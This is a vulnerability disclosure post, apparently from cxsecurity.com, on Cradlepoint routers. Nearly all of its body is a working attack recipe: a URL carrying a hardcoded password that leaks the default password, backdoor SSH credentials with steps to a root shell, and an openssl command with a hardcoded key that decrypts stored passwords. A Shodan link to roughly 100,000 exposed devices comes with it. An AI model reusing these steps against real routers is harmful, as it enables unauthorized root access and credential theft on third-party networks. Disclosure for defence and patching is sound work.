Cradlepoint Router Password Disclosure

2018.11.07
Credit: CrazyOwl
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Many vulnerabilities in the built-in software of the Cradlepoint Router. 100000 such routers can be seen in the shodan (https://www.shodan.io/search?query=cradlepointhttpservice). These vulnerabilities were reported to Cradlepoint in august. A hardcoded password allows you to retrieve sensitive information, including the default password: * go to http://[router IP]/plt?password=W6rqCjk5ijRs6Ya5bv55 * router default password is last 8 characters of WLAN_MAC Escalate privileges using a backdoor account with a hardcode username and password: 1. enable ssh login 2. set control.system.techsupport_access true 3. login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC 4. type 'sh' to get root shell Passwords that are encrypted using a hardcoded key: * for passwords in the configuration store starting with "$1" the encrypted password is all after the last "$" * the password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt -k "NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY="


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top